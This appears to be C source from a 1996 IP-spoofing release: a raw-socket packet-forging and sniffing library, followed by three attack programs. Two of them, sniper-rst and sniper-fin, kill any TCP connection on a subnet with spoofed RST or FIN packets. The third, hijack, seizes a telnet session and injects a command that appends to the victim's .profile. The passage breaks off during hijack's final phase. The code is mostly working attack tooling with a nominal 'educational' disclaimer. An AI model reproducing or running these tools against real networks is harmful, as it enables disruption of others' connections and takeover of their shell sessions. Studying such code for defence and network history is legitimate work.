void sp_fix_TCP_packet (struct sp_data_exchange *);
void sp_fix_UDP_packet (struct sp_data_exchange *);
void sp_fix_IP_packet (struct sp_data_exchange *, unsigned char);
unsigned short in_cksum(unsigned short *, int );
void rc_sigio (int);
void set_filter (char *, unsigned short, char *, unsigned short);

/********************* let the games commence ****************************/

static unsigned long sp_getaddrbyname(char *sp_name)
{
  struct hostent *sp_he;
  in_addr_t sp_addr;
  int i;

  if(isdigit(*sp_name))
     return inet_addr(sp_name);
  for(i=0;i<100;i++)
    {
    if(!(sp_he = gethostbyname(sp_name)))
       {printf("WARNING: gethostbyname failure!\n");
        sleep(1);
        if(i>=3)                  /* always a retry here in this kind of application */
           printf("Couldn't resolve hostname.\n"), exit(1);
       }
    else break;
    }
  if(sp_he==NULL) return 0;
  /* copy the 4 address bytes, whatever sizeof(long) is on this machine */
  memcpy(&sp_addr, sp_he->h_addr_list[0], sizeof(sp_addr));
  return sp_addr;
}

int open_sending (void)
{
  int sp_fd;
  int dummy=1;

  /* they don't come rawer */
  if ((sp_fd = socket(AF_INET, SOCK_RAW, IPPROTO_RAW))==-1)
     perror("Couldn't open Socket."), exit(1);
  /* we build the IP header ourselves. IPPROTO_RAW implies IP_HDRINCL on
     Linux; saying so explicitly costs nothing and documents the intent. */
  if (setsockopt(sp_fd, IPPROTO_IP, IP_HDRINCL, &dummy, sizeof(dummy))==-1)
     perror("Couldn't set IP_HDRINCL."), exit(1);
#ifdef DEBUG
  printf("Raw socket ready\n");
#endif
  return sp_fd;
}

void sp_send_packet (struct sp_data_exchange *sp, unsigned char proto)
{
  int sp_status;
  struct sockaddr_in sp_server;
  struct hostent *sp_help;
  int HEAD_BASE;
  int sp_len;

  /* Construction of destination */
  bzero((char *)&sp_server, sizeof(struct sockaddr));
  sp_server.sin_family = AF_INET;
  sp_server.sin_addr.s_addr = inet_addr(sp->dest);
  if (sp_server.sin_addr.s_addr == (unsigned int)-1)    /* if target not in DOT/number notation */
    {
    if (!(sp_help=gethostbyname(sp->dest)))
       fprintf(stderr,"unknown host %s\n", sp->dest), exit(1);
    bcopy(sp_help->h_addr, (caddr_t)&sp_server.sin_addr, sp_help->h_length);
    };

  switch(proto)
    {
    case 6:  HEAD_BASE = TCP_HEAD_BASE; break;          /* TCP */
    case 17: HEAD_BASE = UDP_HEAD_BASE; break;          /* UDP */
    default: exit(1); break;
    };

  /* TCP_optlen is part of the packet too (the original left it out here,
     so a packet with TCP options went out truncated); it is 0 for UDP. */
  sp_len = sp->datalen+HEAD_BASE+IP_HEAD_BASE+sp->IP_optlen+sp->TCP_optlen;
  sp_status = sendto(sp->fd, (char *)(sp->buffer), sp_len, 0,
                     (struct sockaddr *)&sp_server, sizeof(struct sockaddr));
  if (sp_status < 0 || sp_status != sp_len)
    {
    if (sp_status < 0)
       perror("Sendto"), exit(1);
    printf("hmm... Only transmitted %d of %d bytes.\n", sp_status, sp_len);
    };
#ifdef DEBUG
  printf("Packet transmitted...\n");
#endif
}

void sp_fix_IP_packet (struct sp_data_exchange *sp, unsigned char proto)
{
  struct IP_header *sp_help_ip;
  int HEAD_BASE;

  switch(proto)
    {
    case 6:  HEAD_BASE = TCP_HEAD_BASE; break;          /* TCP */
    case 17: HEAD_BASE = UDP_HEAD_BASE; break;          /* UDP */
    default: exit(1); break;
    };

  sp_help_ip = (struct IP_header *) (sp->buffer);
  sp_help_ip->verlen = (IP_VERSION << 4) | ((IP_HEAD_BASE+sp->IP_optlen)/4);
  sp_help_ip->type = 0;
  sp_help_ip->length = htons(IP_HEAD_BASE+HEAD_BASE+sp->datalen+sp->IP_optlen+sp->TCP_optlen);
  /* Mind you: a constant ID and TTL (and the constant window in
     sp_fix_TCP_packet) make every packet from this library look the same
     on the wire; all three are visible in the step-7 dump above. */
  sp_help_ip->ID = htons(12545);                        /* TEST */
  sp_help_ip->flag_offset = 0;
  sp_help_ip->TTL = 69;
  sp_help_ip->protocol = proto;
  sp_help_ip->source = sp_getaddrbyname(sp->source);
  sp_help_ip->destination = sp_getaddrbyname(sp->dest);
  sp_help_ip->checksum=in_cksum((unsigned short *) (sp->buffer), IP_HEAD_BASE+sp->IP_optlen);
#ifdef DEBUG
  printf("IP header fixed...\n");
#endif
}

void sp_fix_TCP_packet (struct sp_data_exchange *sp)
{
  char sp_pseudo_ip_construct[MTU];
  struct TCP_header *sp_help_tcp;
  struct pseudo_IP_header *sp_help_pseudo;
  int i;

  for(i=0;i<MTU;i++) sp_pseudo_ip_construct[i]=0;

  sp_help_tcp = (struct TCP_header *) (sp->buffer+IP_HEAD_BASE+sp->IP_optlen);
  sp_help_pseudo = (struct pseudo_IP_header *) sp_pseudo_ip_construct;

  sp_help_tcp->offset_flag = htons( (((TCP_HEAD_BASE+sp->TCP_optlen)/4)<<12) | sp->flags);
  sp_help_tcp->seq_nr = htonl(sp->seq);
  sp_help_tcp->ACK_nr = htonl(sp->ack);
  sp_help_tcp->source = htons(sp->source_port);
  sp_help_tcp->destination = htons(sp->dest_port);
  sp_help_tcp->window = htons(0x7c00);                  /* dummy for now 'wujx' */

  sp_help_pseudo->source = sp_getaddrbyname(sp->source);
  sp_help_pseudo->destination = sp_getaddrbyname(sp->dest);
  sp_help_pseudo->zero_byte = 0;
  sp_help_pseudo->protocol = 6;
  sp_help_pseudo->TCP_UDP_len = htons(sp->datalen+TCP_HEAD_BASE+sp->TCP_optlen);
  memcpy(sp_pseudo_ip_construct+12, sp_help_tcp, sp->TCP_optlen+sp->datalen+TCP_HEAD_BASE);
  sp_help_tcp->checksum=in_cksum((unsigned short *) sp_pseudo_ip_construct,
                                 sp->datalen+12+TCP_HEAD_BASE+sp->TCP_optlen);
#ifdef DEBUG
  printf("TCP header fixed...\n");
#endif
}

void transmit_TCP (int sp_fd, char *sp_data,
                   int sp_ipoptlen, int sp_tcpoptlen, int sp_datalen,
                   char *sp_source, unsigned short sp_source_port,
                   char *sp_dest, unsigned short sp_dest_port,
                   unsigned long sp_seq, unsigned long sp_ack,
                   unsigned short sp_flags)
{
  char sp_buffer[1500];
  struct sp_data_exchange sp_struct;

  bzero(sp_buffer,1500);
  if (sp_ipoptlen!=0)
     memcpy(sp_buffer+IP_HEAD_BASE,sp_data,sp_ipoptlen);
  if (sp_tcpoptlen!=0)
     memcpy(sp_buffer+IP_HEAD_BASE+TCP_HEAD_BASE+sp_ipoptlen,
            sp_data+sp_ipoptlen,sp_tcpoptlen);
  if (sp_datalen!=0)
     memcpy(sp_buffer+IP_HEAD_BASE+TCP_HEAD_BASE+sp_ipoptlen+sp_tcpoptlen,
            sp_data+sp_ipoptlen+sp_tcpoptlen,sp_datalen);

  sp_struct.fd = sp_fd;
  sp_struct.data = sp_data;
  sp_struct.datalen = sp_datalen;
  sp_struct.source = sp_source;
  sp_struct.source_port = sp_source_port;
  sp_struct.dest = sp_dest;
  sp_struct.dest_port = sp_dest_port;
  sp_struct.seq = sp_seq;
  sp_struct.ack = sp_ack;
  sp_struct.flags = sp_flags;
  sp_struct.buffer = sp_buffer;
  sp_struct.IP_optlen = sp_ipoptlen;
  sp_struct.TCP_optlen = sp_tcpoptlen;

  sp_fix_TCP_packet(&sp_struct);
  sp_fix_IP_packet(&sp_struct, 6);
  sp_send_packet(&sp_struct, 6);
}

void sp_fix_UDP_packet (struct sp_data_exchange *sp)
{
  char sp_pseudo_ip_construct[MTU];
  struct UDP_header *sp_help_udp;
  struct pseudo_IP_header *sp_help_pseudo;
  int i;

  for(i=0;i<MTU;i++) sp_pseudo_ip_construct[i]=0;

  sp_help_udp = (struct UDP_header *) (sp->buffer+IP_HEAD_BASE+sp->IP_optlen);
  sp_help_pseudo = (struct pseudo_IP_header *) sp_pseudo_ip_construct;

  sp_help_udp->source = htons(sp->source_port);
  sp_help_udp->destination = htons(sp->dest_port);
  sp_help_udp->length = htons(sp->datalen+UDP_HEAD_BASE);

  sp_help_pseudo->source = sp_getaddrbyname(sp->source);
  sp_help_pseudo->destination = sp_getaddrbyname(sp->dest);
  sp_help_pseudo->zero_byte = 0;
  sp_help_pseudo->protocol = 17;
  sp_help_pseudo->TCP_UDP_len = htons(sp->datalen+UDP_HEAD_BASE);
  memcpy(sp_pseudo_ip_construct+12, sp_help_udp, sp->datalen+UDP_HEAD_BASE);
  sp_help_udp->checksum=in_cksum((unsigned short *) sp_pseudo_ip_construct,
                                 sp->datalen+12+UDP_HEAD_BASE);
#ifdef DEBUG
  printf("UDP header fixed...\n");
#endif
}

void transmit_UDP (int sp_fd, char *sp_data,
                   int sp_ipoptlen, int sp_datalen,
                   char *sp_source, unsigned short sp_source_port,
                   char *sp_dest, unsigned short sp_dest_port)
{
  char sp_buffer[1500];
  struct sp_data_exchange sp_struct;

  bzero(sp_buffer,1500);
  if (sp_ipoptlen!=0)
     memcpy(sp_buffer+IP_HEAD_BASE,sp_data,sp_ipoptlen);
  if (sp_data!=NULL)
     memcpy(sp_buffer+IP_HEAD_BASE+UDP_HEAD_BASE+sp_ipoptlen,
            sp_data+sp_ipoptlen,sp_datalen);

  sp_struct.fd = sp_fd;
  sp_struct.data = sp_data;
  sp_struct.datalen = sp_datalen;
  sp_struct.source = sp_source;
  sp_struct.source_port = sp_source_port;
  sp_struct.dest = sp_dest;
  sp_struct.dest_port = sp_dest_port;
  sp_struct.buffer = sp_buffer;
  sp_struct.IP_optlen = sp_ipoptlen;
  sp_struct.TCP_optlen = 0;

  sp_fix_UDP_packet(&sp_struct);
  sp_fix_IP_packet(&sp_struct, 17);
  sp_send_packet(&sp_struct, 17);
}

/* This routine stolen from ping.c -- HAHAHA!*/
unsigned short in_cksum(unsigned short *addr,int len)
{
  register int nleft = len;
  register unsigned short *w = addr;
  register int sum = 0;
  unsigned short answer = 0;

  while (nleft > 1)
    {
    sum += *w++;
    nleft -= 2;
    }
  if (nleft == 1)
    {
    *(u_char *)(&answer) = *(u_char *)w ;
    sum += answer;
    }
  sum = (sum >> 16) + (sum & 0xffff);
  sum += (sum >> 16);
  answer = ~sum;
  return(answer);
}

/************************* Receiving department ****************************/

int open_receiving (char *rc_device, char mode)
{
  int or_fd;
  struct sigaction rc_sa;
  int fcntl_flag;
  struct ifreq ifinfo;

  /* create snoop socket and set interface promisc */
  /* (AF_INET,SOCK_PACKET) is the pre-2.0 packet interface. Current kernels
     still accept it (they map it onto AF_PACKET) but log it as obsolete.
     Root is needed either way. */
  if ((or_fd = socket(AF_INET, SOCK_PACKET, htons(0x3)))==-1)
     perror("Couldn't open Socket."), exit(1);

  memset(&ifinfo, 0, sizeof(ifinfo));
  strncpy(ifinfo.ifr_ifrn.ifrn_name, rc_device, sizeof(ifinfo.ifr_ifrn.ifrn_name)-1);
  if(ioctl(or_fd,SIOCGIFFLAGS,&ifinfo)<0)
     perror("Couldn't get flags."), exit(1);
  ifinfo.ifr_ifru.ifru_flags |= IFF_PROMISC;
  if(ioctl(or_fd,SIOCSIFFLAGS,&ifinfo)<0)
     perror("Couldn't set flags. (PROMISC)"), exit(1);

  if(mode&IO_HANDLE)
    {                                   /* install handler */
    rc_sa.sa_handler=rc_sigio;          /* we don't use signal() */
    sigemptyset(&rc_sa.sa_mask);        /* because the timing window is */
    rc_sa.sa_flags=0;                   /* too big... */
    sigaction(SIGIO,&rc_sa,NULL);
    }
  if(fcntl(or_fd,F_SETOWN,getpid())<0)
     perror("Couldn't set ownership"), exit(1);
  if(mode&IO_HANDLE)
    {
    if( (fcntl_flag=fcntl(or_fd,F_GETFL,0))<0)
       perror("Couldn't get FLAGS"), exit(1);
    if(fcntl(or_fd,F_SETFL,fcntl_flag|FASYNC|FNDELAY)<0)
       perror("Couldn't set FLAGS"), exit(1);
    rc_fd_abc123=or_fd;
    }
  else
    {
    if(mode&IO_NONBLOCK)
      {
      if( (fcntl_flag=fcntl(or_fd,F_GETFL,0))<0)
         perror("Couldn't get FLAGS"), exit(1);
      if(fcntl(or_fd,F_SETFL,fcntl_flag|FNDELAY)<0)
         perror("Couldn't set FLAGS"), exit(1);
      };
    };
#ifdef DEBUG
  printf("Reading socket ready\n");
#endif
  return or_fd;
}

/* returns 0 when no packet read! */
int get_packet (int rc_fd, char *buffer, int *TCP_UDP_start,unsigned char *proto)
{
  char help_buffer[MTU];
  int pack_len;
  struct IP_header *gp_IPhead;

  pack_len = read(rc_fd,help_buffer,1500);
  if(pack_len<0)
    {
    if(errno==EWOULDBLOCK) {pack_len=0;}
    else {perror("Read error:"); exit(1);}
    };
  if(pack_len>0)
    {
    pack_len -= DEV_PREFIX;
    if(pack_len < (int)sizeof(struct IP_header))       /* runt frame: nothing to parse */
       return 0;
    memcpy(buffer,help_buffer+DEV_PREFIX,pack_len);
    gp_IPhead = (struct IP_header *) buffer;
    if(proto != NULL) *proto = gp_IPhead->protocol;
    if(TCP_UDP_start != NULL) *TCP_UDP_start = (gp_IPhead->verlen & 0xF) << 2;
    }
  return pack_len;
}

void wait_packet_timeout (int sig)
{
  alarm(0);
  WAIT_PACKET_WAIT_TIME=1;
}

int wait_packet(int wp_fd,struct sp_wait_packet *ret_values,
                char *wp_source, unsigned short wp_source_port,
                char *wp_dest, unsigned short wp_dest_port,
                int wp_flags, int wait_time)
{
  char wp_buffer[1500];
  struct IP_header *wp_iphead;
  struct TCP_header *wp_tcphead;
  unsigned long wp_sourcel, wp_destl;
  int wp_tcpstart;
  unsigned char wp_proto;               /* was char; get_packet() takes unsigned char * */

  wp_sourcel=sp_getaddrbyname(wp_source);
  wp_destl=sp_getaddrbyname(wp_dest);

  WAIT_PACKET_WAIT_TIME=0;
  if(wait_time!=0)
    {
    signal(SIGALRM,wait_packet_timeout);
    alarm(wait_time);
    }

  while(1)
    {
    while(get_packet(wp_fd, wp_buffer, &wp_tcpstart, &wp_proto)<=0)
      {
      if (WAIT_PACKET_WAIT_TIME!=0) {alarm(0); return -1;}
      };
    if(wp_proto == 6)
      {
      wp_iphead= (struct IP_header *) wp_buffer;
      wp_tcphead= (struct TCP_header *) (wp_buffer+wp_tcpstart);
      if( (wp_sourcel==wp_iphead->source)&&(wp_destl==wp_iphead->destination) )
        {
        if( (ntohs(wp_tcphead->source)==wp_source_port) &&
            (ntohs(wp_tcphead->destination)==wp_dest_port) )
          {
          /* mind you: this matches when ANY of the wanted flags is set */
          if( (wp_flags==0) || (ntohs(wp_tcphead->offset_flag)&wp_flags) )
            {
            ret_values->seq=ntohl(wp_tcphead->seq_nr);
            ret_values->ack=ntohl(wp_tcphead->ACK_nr);
            ret_values->flags=ntohs(wp_tcphead->offset_flag)&
                              (URG|ACK|PSH|FIN|RST|SYN);
            ret_values->datalen = ntohs(wp_iphead->length) -
                                  ((wp_iphead->verlen & 0xF) << 2) -
                                  ((ntohs(wp_tcphead->offset_flag) & 0xF000) >> 10);
            alarm(0);
            return 0;
            }
          }
        }
      }
    }
  /*impossible to get here.. but anyways*/
  alarm(0);
  return -1;
}

void close_receiving (void)
{
  close(rc_fd_abc123);
}

void rc_sigio (int sig)                 /* Packet handling routine */
{
  char rc_buffer[1500];
  char packet_id [50];
  unsigned char *rc_so, *rc_dest;
  struct IP_header *rc_IPhead;
  struct TCP_header *rc_TCPhead;
  int pack_len;

  if(RC_FILTSET==0) return;
  if(SP_DATA_BUSY!=0)                   /* skip this packet */
     return;
  pack_len = read(rc_fd_abc123,rc_buffer,1500);
  if(pack_len < DEV_PREFIX + (int)sizeof(struct IP_header))   /* short read: ignore */
     return;
  rc_IPhead = (struct IP_header *) (rc_buffer + DEV_PREFIX);
  if(rc_IPhead->protocol!=6) return;    /* if not TCP */
  rc_TCPhead = (struct TCP_header *)
               (rc_buffer + DEV_PREFIX + ((rc_IPhead->verlen & 0xF) << 2));
  rc_so = (unsigned char *) &(rc_IPhead->source);
  rc_dest = (unsigned char *) &(rc_IPhead->destination);
  sprintf(packet_id,"%u.%u.%u.%u.%u-%u.%u.%u.%u.%u",
          rc_so[0],rc_so[1],rc_so[2],rc_so[3],ntohs(rc_TCPhead->source),
          rc_dest[0],rc_dest[1],rc_dest[2],rc_dest[3],ntohs(rc_TCPhead->destination));
  if(strcmp(packet_id,rc_filter_string)==0)
    {
    SP_DATA_BUSY=1;
    CUR_SEQ = ntohl(rc_TCPhead->seq_nr);
    CUR_ACK = ntohl(rc_TCPhead->ACK_nr);
    CUR_FLAGS = ntohs(rc_TCPhead->offset_flag);
    CUR_DATALEN = ntohs(rc_IPhead->length) -
                  ((rc_IPhead->verlen & 0xF) << 2) -
                  ((ntohs(rc_TCPhead->offset_flag) & 0xF000) >> 10);
    CUR_COUNT++;
    SP_DATA_BUSY=0;
    }
}

void set_filter (char *f_source, unsigned short f_source_port,
                 char *f_dest, unsigned short f_dest_port)
{
  unsigned char *f_so, *f_des;
  unsigned long f_sol, f_destl;

  RC_FILTSET=0;
  if(DEV_PREFIX==9999)
     fprintf(stderr,"DEV_PREFIX not set!\n"), exit(1);
  f_sol = sp_getaddrbyname(f_source);
  f_destl = sp_getaddrbyname(f_dest);
  f_so = (unsigned char *) &f_sol;
  f_des = (unsigned char *) &f_destl;
  sprintf(rc_filter_string,"%u.%u.%u.%u.%u-%u.%u.%u.%u.%u",
          f_so[0],f_so[1],f_so[2],f_so[3],f_source_port,
          f_des[0],f_des[1],f_des[2],f_des[3],f_dest_port);
  RC_FILTSET=1;
}

ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
---=[ sniper-rst.c ]=---------------------------------------------------------

/**************************************************************************/
/* Sniper-rst - Example program on connection killing with IP spoofing    */
/*              Using the RST flag.                                       */
/*              (illustration for 'A short overview of IP spoofing')      */
/*                                                                        */
/* Purpose - Killing any TCP connection on your subnet                    */
/*                                                                        */
/* Author  - Dr_Sp00f (Himself)                                           */
/*           Serious advice, comments, statements, greets, always welcome */
/*           flames, moronic 3l33t >/dev/null                             */
/*                                                                        */
/* Disclaimer - This program is for educational purposes only. I am in    */
/*              NO way responsible for what you do with this program,     */
/*              or any damage you or this program causes.                 */
/*                                                                        */
/* For whom - People with a little knowledge of TCP/IP, C source code     */
/*            and general UNIX. Otherwise, please keep your hands off,    */
/*            and catch up on those things first.                         */
/*                                                                        */
/* Limited to - Linux 1.3.X or higher.                                    */
/*              ETHERNET support ("eth0" device)                          */
/*              If your network configuration differs it shouldn't be too */
/*              hard to modify yourself.
/*              I got it working on PPP too,                              */
/*              but I'm not including extra configuration possibilities   */
/*              because this would overload this first release that is    */
/*              only a demonstration of the mechanism.                    */
/*              Anyway if you only have ONE network device (slip,         */
/*              ppp,... ) after a quick look at this code and spoofit.h   */
/*              it will only take you a few secs to fix it...             */
/*              People with a bit of C knowledge and well known with      */
/*              their OS shouldn't have too much trouble to port the code.*/
/*              If you do, I would love to get the results.               */
/*                                                                        */
/* Compiling - gcc -o sniper-rst sniper-rst.c                             */
/*                                                                        */
/* Usage - Usage described in the spoofing article that came with this.   */
/*         If you didn't get this, try to get the full release...         */
/*                                                                        */
/* See also - Sniffit (for getting the necessary data on a connection)    */
/**************************************************************************/

#include "spoofit.h"

/* Those 2 'defines' are important for putting the receiving device in */
/* PROMISCUOUS mode */
#define INTERFACE "eth0"
#define INTERFACE_PREFIX 14

char SOURCE[100],DEST[100];
int SOURCE_P,DEST_P;

int main(int argc, char *argv[])
{
  int i,stat,j;
  int fd_send, fd_receive;
  unsigned long sp_ack, sp_seq;
  struct sp_wait_packet pinfo;

  if(argc != 5)
    {
    printf("usage: %s host1 port1 host2 port2\n",argv[0]);
    exit(0);
    }

  /* preparing some work */
  DEV_PREFIX = INTERFACE_PREFIX;
  strcpy(SOURCE,argv[1]); SOURCE_P=atoi(argv[2]);
  strcpy(DEST,argv[3]); DEST_P=atoi(argv[4]);

  /* opening sending and receiving sockets */
  fd_send = open_sending();
  fd_receive = open_receiving(INTERFACE, IO_NONBLOCK);    /* nonblocking IO */

  printf("Trying to terminate the connection\n");
  for(i=1;i<=100;i++)
    {
    /* Waiting for a packet containing an ACK */
    stat=wait_packet(fd_receive,&pinfo,SOURCE,SOURCE_P,DEST,DEST_P,ACK,5);
    if(stat==-1)
      {printf("Connection 5 secs idle or dead...\n");exit(1);}
    /* host1's ACK number is host1's RCV.NXT: the one SEQ a RST sent to
       host1 (spoofed from host2) is certain to land on */
    sp_seq=pinfo.ack;
    sp_ack=0;
    j=0;

    /* Sending our fake Packet */
    /* for(j=0;j<10;j++)   This would be better */
    /*   {                                      */
    transmit_TCP (fd_send, NULL,0,0,0,DEST,DEST_P,SOURCE,SOURCE_P,sp_seq+j,sp_ack,RST);
    /*   }                                      */

    /* waiting for confirmation */
    stat=wait_packet(fd_receive,&pinfo,SOURCE,SOURCE_P,DEST,DEST_P,0,5);
    if(stat<0)
      {
      printf("Connection 5 secs idle or dead...\n");
      exit(0);
      }
    }
  printf("I did not succeed in killing it.\n");
  return 1;
}

ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
---=[ sniper-fin.c ]=---------------------------------------------------------

/**************************************************************************/
/* Sniper-fin - Example program on connection killing with IP spoofing    */
/*              using the FIN flag.                                       */
/*              (illustration for 'A short overview of IP spoofing')      */
/*                                                                        */
/* Purpose - Killing any TCP connection on your subnet                    */
/*                                                                        */
/* Author  - Dr_Sp00f (Himself)                                           */
/*           Serious advice, comments, statements, greets, always welcome */
/*           flames, moronic 3l33t >/dev/null                             */
/*                                                                        */
/* Disclaimer - This program is for educational purposes only. I am in    */
/*              NO way responsible for what you do with this program,     */
/*              or any damage you or this program causes.                 */
/*                                                                        */
/* For whom - People with a little knowledge of TCP/IP, C source code     */
/*            and general UNIX. Otherwise, please keep your hands off,    */
/*            and catch up on those things first.                         */
/*                                                                        */
/* Limited to - Linux 1.3.X or higher.                                    */
/*              ETHERNET support ("eth0" device)                          */
/*              If your network configuration differs it shouldn't be too */
/*              hard to modify yourself. I got it working on PPP too,     */
/*              but I'm not including extra configuration possibilities   */
/*              because this would overload this first release that is    */
/*              only a demonstration of the mechanism.                    */
/*              Anyway if you only have ONE network device (slip,         */
/*              ppp,... ) after a quick look at this code and spoofit.h   */
/*              it will only take you a few secs to fix it...             */
/*              People with a bit of C knowledge and well known with      */
/*              their OS shouldn't have too much trouble to port the code.*/
/*              If you do, I would love to get the results.               */
/*                                                                        */
/* Compiling - gcc -o sniper-fin sniper-fin.c                             */
/*                                                                        */
/* Usage - Usage described in the spoofing article that came with this.   */
/*         If you didn't get this, try to get the full release...         */
/*                                                                        */
/* See also - Sniffit (for getting the necessary data on a connection)    */
/**************************************************************************/

#include "spoofit.h"

/* Those 2 'defines' are important for putting the receiving device in */
/* PROMISCUOUS mode */
#define INTERFACE "eth0"
#define INTERFACE_PREFIX 14

char SOURCE[100],DEST[100];
int SOURCE_P,DEST_P;

int main(int argc, char *argv[])
{
  int i,stat;
  int fd_send, fd_receive;
  unsigned long sp_ack, sp_seq;
  struct sp_wait_packet pinfo;

  if(argc != 5)
    {
    printf("usage: %s host1 port1 host2 port2\n",argv[0]);
    exit(0);
    }

  /* preparing some work */
  DEV_PREFIX = INTERFACE_PREFIX;
  strcpy(SOURCE,argv[1]); SOURCE_P=atoi(argv[2]);
  strcpy(DEST,argv[3]); DEST_P=atoi(argv[4]);

  /* opening sending and receiving sockets */
  fd_send = open_sending();
  fd_receive = open_receiving(INTERFACE, IO_NONBLOCK);    /* nonblocking IO */

  for(i=1;i<100;i++)
    {
    printf("Attack Sequence %d.\n",i);
    /* Waiting for a packet containing an ACK */
    stat=wait_packet(fd_receive,&pinfo,SOURCE,SOURCE_P,DEST,DEST_P,ACK,10);
    if(stat==-1)
      {printf("Connection 10 secs idle... timeout.\n");exit(1);}
    sp_seq=pinfo.ack;                   /* where host1 expects host2's next byte */
    sp_ack=pinfo.seq+pinfo.datalen;     /* and acknowledge all host1 has sent */

    /* Sending our fake Packet */
    transmit_TCP (fd_send, NULL,0,0,0,DEST,DEST_P,SOURCE,SOURCE_P,sp_seq,sp_ack,ACK|FIN);

    /* waiting for confirmation */
    stat=wait_packet(fd_receive,&pinfo,SOURCE,SOURCE_P,DEST,DEST_P,FIN,5);
    if(stat>=0)
      {
      printf("Killed the connection...\n");
      exit(0);
      }
    printf("Hmmmm.... no response detected... (retry)\n");
    }
  printf("I did not succeed in killing it.\n");
  return 1;
}

ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
---=[ hijack.c ]=-------------------------------------------------------------

/**************************************************************************/
/* Hijack - Example program on connection hijacking with IP spoofing      */
/*          (illustration for 'A short overview of IP spoofing')          */
/*                                                                        */
/* Purpose - taking control of a running telnet session, and executing    */
/*           our own command in that shell.                               */
/*                                                                        */
/* Author  - Dr_Sp00f (Himself)                                           */
/*           Serious advice, comments, statements, greets, always welcome */
/*           flames, moronic 3l33t >/dev/null                             */
/*                                                                        */
/* Disclaimer - This program is for educational purposes only. I am in    */
/*              NO way responsible for what you do with this program,     */
/*              or any damage you or this program causes.                 */
/*                                                                        */
/* For whom - People with a little knowledge of TCP/IP, C source code     */
/*            and general UNIX. Otherwise, please keep your hands off,    */
/*            and catch up on those things first.                         */
/*                                                                        */
/* Limited to - Linux 1.3.X or higher.                                    */
/*              ETHERNET support ("eth0" device)                          */
/*              If your network configuration differs it shouldn't be too */
/*              hard to modify yourself. I got it working on PPP too,     */
/*              but I'm not including extra configuration possibilities   */
/*              because this would overload this first release that is    */
/*              only a demonstration of the mechanism.                    */
/*              Anyway if you only have ONE network device (slip,         */
/*              ppp,... ) after a quick look at this code and spoofit.h   */
/*              it will only take you a few secs to fix it...             */
/*              People with a bit of C knowledge and well known with      */
/*              their OS shouldn't have too much trouble to port the code.*/
/*              If you do, I would love to get the results.               */
/*                                                                        */
/* Compiling - gcc -o hijack hijack.c                                     */
/*                                                                        */
/* Usage - Usage described in the spoofing article that came with this.   */
/*         If you didn't get this, try to get the full release...         */
/*                                                                        */
/* See also - Sniffit (for getting the necessary data on a connection)    */
/**************************************************************************/

#include "spoofit.h"                /* My spoofing include.... read licence on this */

/* Those 2 'defines' are important for putting the receiving device in */
/* PROMISCUOUS mode */
#define INTERFACE "eth0"            /* first ethernet device */
#define INTERFACE_PREFIX 14         /* 14 bytes is an ethernet header */

#define PERSONAL_TOUCH 666

int fd_receive, fd_send;
char CLIENT[100],SERVER[100];
int CLIENT_P;

int main(int argc, char *argv[])
{
  int i,j,count;
  struct sp_wait_packet attack_info;
  unsigned long sp_seq ,sp_ack;
  unsigned long old_seq ,old_ack;
  unsigned long serv_seq ,serv_ack;

  /* This data used to clean up the shell line */
  char to_data[]={0x08, 0x08,0x08, 0x08, 0x08, 0x08, 0x08, 0x08, 0x0a, 0x0a};
  char evil_data[]="echo \"echo HACKED\" >>$HOME/.profile\n";

  if(argc!=4)
    {
    printf("Usage: %s client client_port server\n",argv[0]);
    exit(1);
    }
  strcpy(CLIENT,argv[1]);
  CLIENT_P=atoi(argv[2]);
  strcpy(SERVER,argv[3]);

  /* preparing all necessary sockets (sending + receiving) */
  DEV_PREFIX = INTERFACE_PREFIX;
  fd_send = open_sending();
  fd_receive = open_receiving(INTERFACE, 0);      /* normal BLOCKING mode */

  printf("Starting Hijacking demo - Brecht Claerhout 1996\n");
  printf("-----------------------------------------------\n");
  for(j=0;j<50;j++)
    {
    printf("\nTakeover phase 1: Stealing connection.\n");
    wait_packet(fd_receive,&attack_info,CLIENT, CLIENT_P, SERVER, 23,ACK|PSH,0);
    sp_seq=attack_info.seq+attack_info.datalen;
    sp_ack=attack_info.ack;
    printf("  Sending Spoofed clean-up data...\n");
    transmit_TCP(fd_send, to_data,0,0,sizeof(to_data),CLIENT, CLIENT_P, SERVER,23,
                 sp_seq,sp_ack,ACK|PSH);
    /* NOTE: always beware you receive y'r OWN spoofed packs!
       */
    /* so handle it if necessary */
    count=0;
    printf("  Waiting for spoof to be confirmed...\n");
    while(count<5)
      {
      wait_packet(fd_receive, &attack_info,SERVER,23,CLIENT,CLIENT_P,ACK,0);
      if(attack_info.ack==sp_seq+sizeof(to_data))
        count=PERSONAL_TOUCH;
      else
        count++;
      };
    if(count!=PERSONAL_TOUCH)
      {printf("Phase 1 unsuccessfully ended.\n");}
    else
      {printf("Phase 1 ended.\n"); break;};
    };

  printf("\nTakeover phase 2: Getting on track with SEQ/ACK's again\n");
  /* serv_ack initialised too: old_ack is copied from it before the first
     packet arrives, so it must not be left undefined */
  count=serv_seq=serv_ack=old_ack=0;
  while(count<10)
    {
    old_seq=serv_seq;
    old_ack=serv_ack;
    wait_packet(fd_receive,&attack_info,SERVER, 23, CLIENT, CLIENT_P, ACK,0);
    if(attack_info.datalen==0)
      {
      serv_seq=attack_info.seq+attack_info.datalen;
      serv_ack=attack_info.ack;
      if( (old_seq==serv_seq)&&(serv_ack==old_ack) )
        count=PERSONAL_TOUCH;
      else
        count++;
      }
    };
  if(count!=PERSONAL_TOUCH)
    {printf("Phase 2 unsuccessfully ended.\n"); exit(0);}
  printf("  Server SEQ: %lX (hex) ACK: %lX (hex)\n",serv_seq,serv_ack);
  printf("Phase 2 ended.\n");

  printf("\nTakeover phase 3: Sending MY data.\n");
